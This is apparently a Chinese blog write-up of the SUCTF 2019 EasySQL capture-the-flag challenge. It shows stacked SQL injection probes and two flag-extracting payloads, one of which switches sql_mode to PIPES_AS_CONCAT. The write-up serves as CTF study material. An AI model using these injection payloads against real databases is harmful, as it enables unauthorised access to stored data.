[SUCTF 2019]EasySQL

[SUCTF 2019]EasySQL

【SQL注入】

方法一

打开题目,看到输入框便直接进行注入点的试探。
在这里插入图片描述

1			// 这里输入任意的数字都会得到一条回显(0除外)
0	1’		// 输入0 1' 1'#都没有回显
1"	1' or 1=1#		// 回显Nonono(看不大懂)

因为回显的不同显然应该是有注入点的,但是不论输入order by, union, select, from都回显 Nonono ,八成是被过滤了吧!(大小写,双写也都不得行)再次尝试堆叠注入。

1;show databases;
1;show tables;

在这里插入图片描述
尝试查看表结构1;desc Flag;,依旧 Nonono ,离谱,拿 flag 也过滤?!

回想所有的尝试,任意数字有数组回显,0 、任意字符、关键字不行,flag 也不行。猜测SQL语句:

select $post['query'] || flag from Flag;
# 因为
# 只有一个表Flag,那查询的必是这个表;
# 输入任意数字可以,任意数字都可以被理解为布尔 1 ,而只有 0 例外;(任意字符当然也不行了)
# 关键字不行是被过滤,且把 flag 也作为关键字过滤。
// (这里是看过wp理解的,本人脑洞还是不够大)

构造Payload:*,1,构成的SQL语句:select *,1 || flag from Flag;

得到 flag 。

在这里插入图片描述

方法二

修改 MySql 配置参数,使||作为字符串连接操作符而不是逻辑运算符执行。

Payload:1;set sql_mode=PIPES_AS_CONCAT;select 1,得到 flag 。

(可以看出最终结果将select 1select flag from Flag;的结果拼接到了一起)

在这里插入图片描述

参考
https://blog.csdn.net/weixin_42373127/article/details/88866710
https://blog.csdn.net/RABCDXB/article/details/111398725

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值